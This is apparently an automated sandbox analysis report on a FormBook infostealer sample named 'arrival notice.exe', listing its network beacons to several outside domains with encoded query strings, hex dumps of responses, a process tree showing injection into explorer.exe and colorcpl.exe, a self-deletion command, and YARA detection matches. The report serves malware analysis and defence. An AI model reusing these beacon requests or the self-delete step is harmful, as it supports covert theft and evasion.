                                                  Sep 15, 2021 09:24:27.149013996 CEST7775OUTGET /n58i/?jrU4NBtp=SuMp/r8m7MLbsAhdx2+vo4RDv4Fspb+bmHugmTCD5o7ZU3vK4HF56dfp1g0HnRS7M8EDPfOdWw==&vbOlS=UboLn HTTP/1.1
                                                  Host: www.ilovecoventry.com
                                                  Connection: close
                                                  Data Raw: 00 00 00 00 00 00 00
                                                  Data Ascii:


                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                  1192.168.2.649819217.160.0.15080C:\Windows\explorer.exe
                                                  TimestampkBytes transferredDirectionData
                                                  Sep 15, 2021 09:24:30.204515934 CEST7776OUTGET /n58i/?vbOlS=UboLn&jrU4NBtp=T43/QHtHCDAxgurMA2nnAzm7cVxOj31InS0qjlwJ5pTUrF8t/fgh9WgQ4TT9zfTSmLODbJhfnA== HTTP/1.1
                                                  Host: www.beerenhunger.info
                                                  Connection: close
                                                  Data Raw: 00 00 00 00 00 00 00
                                                  Data Ascii:
                                                  Sep 15, 2021 09:24:30.234213114 CEST7777INHTTP/1.1 404 Not Found
                                                  Content-Type: text/html
                                                  Content-Length: 601
                                                  Connection: close
                                                  Date: Wed, 15 Sep 2021 07:24:30 GMT
                                                  Server: Apache
                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 0a 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0a 20 3c 68 65 61 64 3e 0a 20 20 3c 74 69 74 6c 65 3e 0a 20 20 20 45 72 72 6f 72 20 34 30 34 20 2d 20 4e 6f 74 20 66 6f 75 6e 64 0a 20 20 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 3e 0a 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 22 3e 0a 20 3c 2f 68 65 61 64 3e 0a 20 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 61 72 69 61 6c 3b 22 3e 0a 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 23 30 61 33 32 38 63 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 30 65 6d 3b 22 3e 0a 20 20 20 45 72 72 6f 72 20 34 30 34 20 2d 20 4e 6f 74 20 66 6f 75 6e 64 0a 20 20 3c 2f 68 31 3e 0a 20 20 3c 70 20 73 74 79 6c 65 3d 22 66 6f 6e 74 2d 73 69 7a 65 3a 30 2e 38 65 6d 3b 22 3e 0a 20 20 20 44 69 65 20 61 6e 67 65 67 65 62 65 6e 65 20 53 65 69 74 65 20 6b 6f 6e 6e 74 65 20 6e 69 63 68 74 20 67 65 66 75 6e 64 65 6e 20 77 65 72 64 65 6e 2e 0a 20 20 3c 2f 70 3e 0a 20 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                  Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN""http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/xhtml"> <head> <title> Error 404 - Not found </title> <meta content="text/html; charset=utf-8" http-equiv="Content-Type"> <meta content="no-cache" http-equiv="cache-control"> </head> <body style="font-family:arial;"> <h1 style="color:#0a328c;font-size:1.0em;"> Error 404 - Not found </h1> <p style="font-size:0.8em;"> Die angegebene Seite konnte nicht gefunden werden. </p> </body></html>


                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                  2192.168.2.649820198.185.159.14480C:\Windows\explorer.exe
                                                  TimestampkBytes transferredDirectionData
                                                  Sep 15, 2021 09:24:35.478707075 CEST7778OUTGET /n58i/?jrU4NBtp=kluGknW3JYulth+FZOKNGJWFLrjrg7vx1WPWThgYE53lU0Uyu20JwynqYY4FZ9Ej1j1u7QgdhQ==&vbOlS=UboLn HTTP/1.1
                                                  Host: www.singisa4letterword.com
                                                  Connection: close
                                                  Data Raw: 00 00 00 00 00 00 00
                                                  Data Ascii:
                                                  Sep 15, 2021 09:24:35.636576891 CEST7779INHTTP/1.1 400 Bad Request
                                                  Cache-Control: no-cache, must-revalidate
                                                  Content-Length: 77564
                                                  Content-Type: text/html; charset=UTF-8
                                                  Date: Wed, 15 Sep 2021 07:24:35 UTC
                                                  Expires: Thu, 01 Jan 1970 00:00:00 UTC
                                                  Pragma: no-cache
                                                  Server: Squarespace
                                                  X-Contextid: iBmc1kFd/LhSjXyZH
                                                  Connection: close
                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 77 68 69 74 65 3b 0a 20 20 7d 0a 0a 20 20 6d 61 69 6e 20 7b 0a 20 20 20 20 70 6f 73 69 74 69 6f 6e 3a 20 61 62 73 6f 6c 75 74 65 3b 0a 20 20 20 20 74 6f 70 3a 20 35 30 25 3b 0a 20 20 20 20 6c 65 66 74 3a 20 35 30 25 3b 0a 20 20 20 20 74 72 61 6e 73 66 6f 72 6d 3a 20 74 72 61 6e 73 6c 61 74 65 28 2d 35 30 25 2c 20 2d 35 30 25 29 3b 0a 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 6d 69 6e 2d 77 69 64 74 68 3a 20 39 35 76 77 3b 0a 20 20 7d 0a 0a 20 20 6d 61 69 6e 20 68 31 20 7b 0a 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 33 30 30 3b 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 34 2e 36 65 6d 3b 0a 20 20 20 20 63 6f 6c 6f 72 3a 20 23 31 39 31 39 31 39 3b 0a 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 20 30 20 31 31 70 78 20 30 3b 0a 20 20 7d 0a 0a 20 20 6d 61 69 6e 20 70 20 7b 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 2e 34 65 6d 3b 0a 20 20 20 20 63 6f 6c 6f 72 3a 20 23 33 61 33 61 33 61 3b 0a 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 33 30 30 3b 0a 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 32 65 6d 3b 0a 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 7d 0a 0a 20 20 6d 61 69 6e 20 70 20 61 20 7b 0a 20 20 20 20 63 6f 6c 6f 72 3a 20 23 33 61 33 61 33 61 3b 0a 20 20 20 20 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 20 6e 6f 6e 65 3b 0a 20 20 20 20 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 20 73 6f 6c 69 64 20 31 70 78 20 23 33 61 33 61 33 61 3b 0a 20 20 7d 0a 0a 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 22 43 6c 61 72 6b 73 6f 6e 22 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 32 70 78 3b 0a 20 20 7d 0a 0a 20 20 23 73 74 61 74 75 73 2d 70 61 67 65 20 7b 0a 20 20 20 20 64 69 73 70 6c 61 79 3a 20 6e 6f 6e 65 3b 0a 20 20 7d 0a 0a 20 20 66 6f 6f 74 65 72 20 7b 0a 20 20 20 20 70 6f 73 69 74 69 6f 6e 3a 20 61 62 73 6f 6c 75 74 65 3b 0a 20 20 20 20 62 6f 74 74 6f 6d 3a 20 32 32 70 78 3b 0a 20 20 20 20 6c 65 66 74 3a 20 30 3b 0a 20 20 20 20 77 69 64 74 68 3a 20 31 30 30 25 3b 0a 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 32 65 6d 3b 0a 20 20 7d 0a 0a 20 20 66 6f 6f 74 65 72 20 73 70 61 6e 20 7b 0a 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 20 31 31 70 78 3b 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 65 6d 3b 0a 20 20 20 20
                                                  Data Ascii: <!DOCTYPE html><head> <title>400 Bad Request</title> <meta name="viewport" content="width=device-width, initial-scale=1"> <style type="text/css"> body { background: white; } main { position: absolute; top: 50%; left: 50%; transform: translate(-50%, -50%); text-align: center; min-width: 95vw; } main h1 { font-weight: 300; font-size: 4.6em; color: #191919; margin: 0 0 11px 0; } main p { font-size: 1.4em; color: #3a3a3a; font-weight: 300; line-height: 2em; margin: 0; } main p a { color: #3a3a3a; text-decoration: none; border-bottom: solid 1px #3a3a3a; } body { font-family: "Clarkson", sans-serif; font-size: 12px; } #status-page { display: none; } footer { position: absolute; bottom: 22px; left: 0; width: 100%; text-align: center; line-height: 2em; } footer span { margin: 0 11px; font-size: 1em;
                                                  Sep 15, 2021 09:24:35.636601925 CEST7780INData Raw: 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 33 30 30 3b 0a 20 20 20 20 63 6f 6c 6f 72 3a 20 23 61 39 61 39 61 39 3b 0a 20 20 20 20 77 68 69 74 65 2d 73 70 61 63 65 3a 20 6e 6f 77 72 61 70 3b 0a 20 20 7d 0a 0a 20 20 66 6f 6f 74 65 72 20 73 70 61 6e 20
                                                  Data Ascii: font-weight: 300; color: #a9a9a9; white-space: nowrap; } footer span strong { font-weight: 300; color: #191919; } @media (max-width: 600px) { body { font-size: 10px; } } @font-face { font-family
                                                  Sep 15, 2021 09:24:35.636615992 CEST7782INData Raw: 5a 63 36 54 67 4b 77 31 43 5a 4c 45 58 79 47 5a 76 49 55 6a 4a 54 46 4c 57 58 69 45 6a 6b 6a 50 2f 45 62 4e 73 72 37 4a 58 55 39 6b 62 54 57 76 76 4e 49 74 64 68 59 66 30 56 70 6a 56 43 35 78 36 41 57 48 30 43 6f 70 4a 39 6b 4c 4c 32 46 4d 6f 34
                                                  Data Ascii: Zc6TgKw1CZLEXyGZvIUjJTFLWXiEjkjP/EbNsr7JXU9kbTWvvNItdhYf0VpjVC5x6AWH0CopJ9kLL2FMo41uoZFFIwX0vyHuEjHYH2VmrxOkqFo0adgxDecFou4ep9oyEd/DYGc3ZB+z+7LZeRzLqapLukxRFwknNZLe1mD3UUryptN0i8agj3nXEkMT3jM6TFgFmSPui9ANP5tgumW+7GL2HT49v6T21zEFSmU/PyRmlIHkbMt
                                                  Sep 15, 2021 09:24:35.636656046 CEST7782INData Raw: 41 62 54 6a 45 6d 75 66 55 51 6f 51 67 41 37 52 69 72 39 61 39 68 5a 78 71 47 69 48 63 52 46 7a 33 71 43 59 53 35 6f 69 36 56 6e 58 56 63 2b 31 6a 6f 48 35 33 57 4c 6c 77 6a 39 5a 58 78 72 33 37 75 63 66 65 38 35 4b 59 62 53 5a 45 6e 4e 50 71 75
                                                  Data Ascii: AbTjEmufUQoQgA7Rir9a9hZxqGiHcRFz3qCYS5oi6VnXVc+1joH53WLlwj9ZXxr37ucfe85KYbSZEnNPquYQLdZGuGjum67O6vs4pznNN15fYXFdOLuLWXrsKEmCQSfZo21npOsch0vJ4uwm8gxs1rVFd7xXNcYLdHOA8u6Q+yN/ryi71Hun8adEPitdau1oRoJdRdmo7vWKu+0nK470m8D6uPnOKeCe7xMpwlB3s5Szbpd7HP+
                                                  Sep 15, 2021 09:24:35.636814117 CEST7783INData Raw: 64 57 72 56 38 34 7a 76 71 7a 55 70 39 38 37 66 66 4f 71 71 2b 70 6a 34 6c 4d 59 63 71 2b 5a 58 75 5a 73 78 54 49 4d 35 5a 7a 6e 4f 75 49 56 7a 61 6e 45 38 43 58 6a 4f 52 4a 38 38 35 36 67 57 65 63 49 73 37 33 47 34 49 56 61 54 6f 6d 2b 46 64 5a
                                                  Data Ascii: dWrV84zvqzUp987ffOqq+pj4lMYcq+ZXuZsxTIM5ZznOuIVzanE8CXjORJ8856gWecIs73G4IVaTom+FdZmk13iQhZpVvwWaeJJvZwmZfgLrMEPDsmWSeTP2pgBIVqr44ljnDOc42NDfmKJscRnzjslLu8YD7DeUiQta8q+gTM8UuJgxqs1ltlxGmF3mHRe8w7M6YKbpYWBIZw6abAXoINXCHv8WIYdhau8bWC2V991qxUKLIeS
                                                  Sep 15, 2021 09:24:35.637007952 CEST7785INData Raw: 73 55 74 73 78 4c 45 35 68 38 53 70 70 4e 4d 66 78 35 69 6a 57 48 70 62 33 6d 5a 31 45 36 68 46 5a 43 4f 74 4a 6d 38 39 4a 38 42 6e 78 37 48 39 43 4d 66 7a 59 41 58 4d 37 66 6d 78 47 73 68 77 4c 6a 56 68 6f 78 30 49 4c 46 71 72 77 35 2b 64 6f 7a
                                                  Data Ascii: sUtsxLE5h8SppNMfx5ijWHpb3mZ1E6hFZCOtJm89J8Bnx7H9CMfzYAXM7fmxGshwLjVhox0ILFqrw5+doz1Kt5lGsvahyjMuRVHINKIASaMX6Aaz/zP39dVJaibMTznE8XEmMq8H7zHPYm8ZeF/aKMDTB0O12KY6trbCV4ekxPC26HLAH2M1LTSQ0hyP1ROTBMgNLCwxVMHS4fHg2e2RNqvGnJI340EzbSTZWms3Y345WE1qeFI
                                                  Sep 15, 2021 09:24:35.638533115 CEST7786INData Raw: 6a 66 69 63 35 33 53 6e 75 34 72 53 74 2b 48 74 59 6a 2b 4a 76 41 47 4a 49 64 55 67 7a 75 6b 70 63 44 65 4a 72 47 31 62 6d 34 57 73 62 6c 75 59 78 4f 77 31 62 47 7a 77 4c 30 44 74 4c 41 71 42 6c 41 74 30 35 36 4c 61 6a 65 7a 71 36 48 72 5a 50 77
                                                  Data Ascii: jfic53Snu4rSt+HtYj+JvAGJIdUgzukpcDeJrG1bm4WsbluYxOw1bGzwL0DtLAqBlAt056Lajezq6HrZPw/M09kfgGcfzBOwryRaVDs6DJQcm6Z8PXsbsd4goAUYk4XLU6HLUiC2fVyfFCeYUc9OUuGlK7uaNENPDxPKgKHrPYD2KRgA0Jz1pdYiVah3ihI8SsbuZ7Qut7FtdT28OepdJALQ9kcuIqJaIlksKpGWQaBJEs5Ro2u
                                                  Sep 15, 2021 09:24:35.641799927 CEST7787INData Raw: 49 73 56 6e 48 51 76 47 66 48 4a 59 2b 47 73 46 4f 76 65 49 61 4c 6b 5a 54 6f 6d 2b 43 35 70 6e 6e 30 5a 74 5a 4f 73 63 53 62 64 54 51 5a 49 5a 49 6a 7a 4e 47 71 33 6a 5a 65 59 56 58 71 62 44 42 4b 37 7a 4f 50 76 37 4e 6d 78 7a 6d 4d 43 6f 36 79
                                                  Data Ascii: IsVnHQvGfHJY+GsFOveIaLkZTom+C5pnn0ZtZOscSbdTQZIZIjzNGq3jZeYVXqbDBK7zOPv7NmxzmMCo6yxGOpqJLxQEPP8ebkh2xjxPso8Vpyed4bWtGDod5nbfYx2tE9IjIcwqDOQxCLgjqhrjJapxQj5aykZ/KjJyp8vYw2jOkioWHg6QaitbobouivfRYdGlwB0//RiIvIqLJ/al9rsfi5oavS3VijivkmceYKJ2jlOzsy3
                                                  Sep 15, 2021 09:24:35.642426968 CEST7789INData Raw: 62 61 4b 64 68 59 6b 30 71 76 4f 51 56 49 71 79 6b 70 38 72 73 6c 57 4b 4b 62 77 45 6d 55 72 39 49 52 64 38 6c 67 73 49 66 2b 75 77 66 68 39 72 73 6a 2f 2f 30 34 7a 38 50 49 39 68 69 6d 33 61 35 51 30 68 41 67 43 76 57 73 45 6c 37 48 4c 47 6b 53
                                                  Data Ascii: baKdhYk0qvOQVIqykp8rslWKKbwEmUr9IRd8lgsIf+uwfh9rsj//04z8PI9him3a5Q0hAgCvWsEl7HLGkSm8xy74a7RIq2RyhLLq4vENxWg6Z8OdDn9k/pO8nvZ82B9HQH4suep5bgnoW/t4r+OSsr3KDZZ7hjnjRmpSwWGJ1Rz24Sgbupfrusw+nYg9brZp6vKv2bXV9yNo3FwRf1UmbhULadGRmefHVN7jCO1g05Yzd4bBIOY
                                                  Sep 15, 2021 09:24:35.644004107 CEST7790INData Raw: 50 33 55 43 44 61 59 67 2f 34 41 2f 4a 38 2b 65 6d 71 41 74 30 47 53 57 39 51 6d 2b 6b 37 6b 35 75 59 62 72 75 30 61 4e 30 4a 59 59 52 78 4a 2b 54 49 52 2b 6e 4c 46 4d 64 4f 39 39 63 4f 75 69 69 68 38 46 49 79 73 53 4d 78 4b 7a 59 77 45 59 32 73
                                                  Data Ascii: P3UCDaYg/4A/J8+emqAt0GSW9Qm+k7k5uYbru0aN0JYYRxJ+TIR+nLFMdO99cOuiih8FIysSMxKzYwEY2sYWtbOMEdrKbPexlHwd4Hi/ghbyIF/MSXuoOf52DHIoeT/J0/wJ3SqRpQnpexxt4N+/hvbyP9ztH3+MHTs4d3Mnd3MuDPMpjQmmVVVe7pmpu5KHLiejRfHs+PruYnKemd+nbnlzBbpT+/sSSBYiT///ekfH78UPEBW
                                                  Sep 15, 2021 09:24:35.797035933 CEST7792INData Raw: 39 79 46 49 39 70 49 64 59 71 59 66 31 4d 41 4e 36 52 49 2b 77 53 49 2f 71 55 5a 5a 48 77 6a 6f 6a 59 54 73 6a 59 66 6d 34 36 56 4d 69 5a 79 64 45 7a 72 5a 48 7a 71 5a 46 7a 72 5a 46 7a 6e 5a 45 7a 72 4b 52 73 33 7a 6b 72 44 74 79 6c 6f 75 63 37
                                                  Data Ascii: 9yFI9pIdYqYf1MAN6RI+wSI/qUZZHwjojYTsjYfm46VMiZydEzrZHzqZFzrZFznZEzrKRs3zkrDtylouc7Y6c5SNn2chZLr75MySMUDeDNMxk2kyDdtPEJJOKxLSMvRjTTD7cnRbuTgp3m8OV6eHKjHBlZrgyK1yZHa7MCVfmhivzwpWOcKUzXOkKV7rDlZ5wpTdc6QtX+sOVgfBjOPwohx9Tw4/28CMXfmTCj9bwoxZ+JOFHMf


                                                  Code Manipulations

                                                  Statistics

                                                  CPU Usage

                                                  Click to jump to process

                                                  Memory Usage

                                                  Click to jump to process

                                                  High Level Behavior Distribution

                                                  Click to dive into process behavior distribution

                                                  Behavior

                                                  Click to jump to process

                                                  System Behavior

                                                  Analysis Process: arrival notice.exe PID: 6224 Parent PID: 6112

                                                  General

                                                  Start time:09:22:39
                                                  Start date:15/09/2021
                                                  Path:C:\Users\user\Desktop\arrival notice.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:'C:\Users\user\Desktop\arrival notice.exe'
                                                  Imagebase:0x220000
                                                  File size:677376 bytes
                                                  MD5 hash:692C22C9579CE47100A87E90F911B202
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:.Net C# or VB.NET
                                                  Yara matches:
                                                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000002.381507015.0000000003639000.00000004.00000001.sdmp, Author: Joe Security
                                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000002.381507015.0000000003639000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                  • Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000002.381507015.0000000003639000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                  • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000001.00000002.381135293.0000000002641000.00000004.00000001.sdmp, Author: Joe Security
                                                  Reputation:low

                                                  Chronological Activities

                                                  Analysis Process: arrival notice.exe PID: 6400 Parent PID: 6224

                                                  General

                                                  Start time:09:22:53
                                                  Start date:15/09/2021
                                                  Path:C:\Users\user\Desktop\arrival notice.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:C:\Users\user\Desktop\arrival notice.exe
                                                  Imagebase:0xac0000
                                                  File size:677376 bytes
                                                  MD5 hash:692C22C9579CE47100A87E90F911B202
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Yara matches:
                                                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000003.00000002.451243764.00000000013D0000.00000040.00020000.sdmp, Author: Joe Security
                                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000003.00000002.451243764.00000000013D0000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                  • Rule: Formbook, Description: detect Formbook in memory, Source: 00000003.00000002.451243764.00000000013D0000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000003.00000002.451277179.0000000001400000.00000040.00020000.sdmp, Author: Joe Security
                                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000003.00000002.451277179.0000000001400000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                  • Rule: Formbook, Description: detect Formbook in memory, Source: 00000003.00000002.451277179.0000000001400000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000003.00000002.450526956.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000003.00000002.450526956.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                  • Rule: Formbook, Description: detect Formbook in memory, Source: 00000003.00000002.450526956.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                  Reputation:low

                                                  Chronological Activities

                                                  Analysis Process: explorer.exe PID: 3440 Parent PID: 6400

                                                  General

                                                  Start time:09:22:57
                                                  Start date:15/09/2021
                                                  Path:C:\Windows\explorer.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:C:\Windows\Explorer.EXE
                                                  Imagebase:0x7ff6f22f0000
                                                  File size:3933184 bytes
                                                  MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Yara matches:
                                                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000004.00000000.417306189.000000000F67C000.00000040.00020000.sdmp, Author: Joe Security
                                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000000.417306189.000000000F67C000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                  • Rule: Formbook, Description: detect Formbook in memory, Source: 00000004.00000000.417306189.000000000F67C000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                  Reputation:high

                                                  Chronological Activities

                                                  Analysis Process: colorcpl.exe PID: 6788 Parent PID: 3440

                                                  General

                                                  Start time:09:23:24
                                                  Start date:15/09/2021
                                                  Path:C:\Windows\SysWOW64\colorcpl.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:C:\Windows\SysWOW64\colorcpl.exe
                                                  Imagebase:0xdd0000
                                                  File size:86528 bytes
                                                  MD5 hash:746F3B5E7652EA0766BA10414D317981
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Yara matches:
                                                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000A.00000002.616538896.00000000048B0000.00000040.00020000.sdmp, Author: Joe Security
                                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000A.00000002.616538896.00000000048B0000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                  • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000A.00000002.616538896.00000000048B0000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000A.00000002.616603392.00000000048E0000.00000004.00000001.sdmp, Author: Joe Security
                                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000A.00000002.616603392.00000000048E0000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                  • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000A.00000002.616603392.00000000048E0000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000A.00000002.613983014.0000000000960000.00000040.00020000.sdmp, Author: Joe Security
                                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000A.00000002.613983014.0000000000960000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                  • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000A.00000002.613983014.0000000000960000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                  Reputation:moderate

                                                  Chronological Activities

                                                  Analysis Process: cmd.exe PID: 6256 Parent PID: 6788

                                                  General

                                                  Start time:09:23:29
                                                  Start date:15/09/2021
                                                  Path:C:\Windows\SysWOW64\cmd.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:/c del 'C:\Users\user\Desktop\arrival notice.exe'
                                                  Imagebase:0x2a0000
                                                  File size:232960 bytes
                                                  MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:high

                                                  Chronological Activities

                                                  Analysis Process: conhost.exe PID: 6240 Parent PID: 6256

                                                  General

                                                  Start time:09:23:30
                                                  Start date:15/09/2021
                                                  Path:C:\Windows\System32\conhost.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                  Imagebase:0x7ff61de10000
                                                  File size:625664 bytes
                                                  MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:high

                                                  Chronological Activities

                                                  Disassembly

                                                  Code Analysis

                                                  Reset < >

                                                    Analysis Process: arrival notice.exe PID: 6224 Parent PID: 6112 arrival notice.exeCOMMON

                                                    Executed Functions

                                                    Function 009DB720, Relevance: 6.1, APIs: 4, Instructions: 124threadCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetCurrentProcess.KERNEL32 ref: 009DB790
                                                    • GetCurrentThread.KERNEL32 ref: 009DB7CD
                                                    • GetCurrentProcess.KERNEL32 ref: 009DB80A
                                                    • GetCurrentThreadId.KERNEL32 ref: 009DB863
                                                    Memory Dump Source
                                                    • Source File: 00000001.00000002.380781059.00000000009D0000.00000040.00000001.sdmp, Offset: 009D0000, based on PE: false
                                                    Similarity
                                                    • API ID: Current$ProcessThread
                                                    • String ID:
                                                    • API String ID: 2063062207-0
                                                    • Opcode ID: 1241a1036132083f4829c018d12a6e25c3f2b570cad7de4c66b956b28419a9c4
                                                    • Instruction ID: d345de566b9b60259bc3183e4dd710240f24b3c822b09b25d16c3c159cb2b585
                                                    • Opcode Fuzzy Hash: 1241a1036132083f4829c018d12a6e25c3f2b570cad7de4c66b956b28419a9c4
                                                    • Instruction Fuzzy Hash: 8B5145B4D00649CFDB10CFA9D548BDEBBF4AF48314F24896AE409A7350D7746884CF65
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 009DB730, Relevance: 6.1, APIs: 4, Instructions: 120threadCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetCurrentProcess.KERNEL32 ref: 009DB790
                                                    • GetCurrentThread.KERNEL32 ref: 009DB7CD
                                                    • GetCurrentProcess.KERNEL32 ref: 009DB80A
                                                    • GetCurrentThreadId.KERNEL32 ref: 009DB863
                                                    Memory Dump Source
